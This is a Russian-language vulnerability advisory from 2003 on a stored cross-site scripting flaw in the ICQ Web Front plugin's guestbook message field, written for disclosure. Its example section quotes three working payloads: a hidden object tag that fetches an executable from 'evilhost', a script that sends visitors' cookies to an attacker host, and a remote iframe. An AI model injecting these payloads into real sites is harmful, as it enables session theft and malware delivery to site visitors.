Межсайтовый скриптинг в ICQ Web Front plugin
| Дата публикации: | 09.09.2003 |
| Всего просмотров: | 2405 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
Уязвимые версии: ICQ Web Front plugin для ICQ 200x Описание: Уязвимость обнаружена в ICQ Web Front. Удаленный пользовать может выполнить XSS нападение. Сценарий http://[host]/guestbook.html не фильтрует данные, представленные пользователем в поле message. В результате удаленный атакующий может выполнить XSS нападение против пользователей, посетивших ICQ Web Front. Пример/Эксплоит: ex 1: ----- <object style="display:none" data="http://evilhost/bad.asp"> </object> dropping and executing a .exe of the attackers choice on vunerable browsers ala eeye or malware's mad <object> teknikz who says you cant root via the XSS !!! ex 2: ----- <SCRIPT>location.href="http://evilhost/xss.cgi?ref="+document.URL+"cookie="+docu ment.cookie;</script> cookie grabbin' ex 3: ----- <iframe src="http://evilhost.com"></iframe> remote frame content inclusion etc etc etc... URL производителя: http://www.icq.com Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Не пользуйтесь ICQ Web Front. |
|
| Ссылки: | ICQ Webfront - Persistant XSS |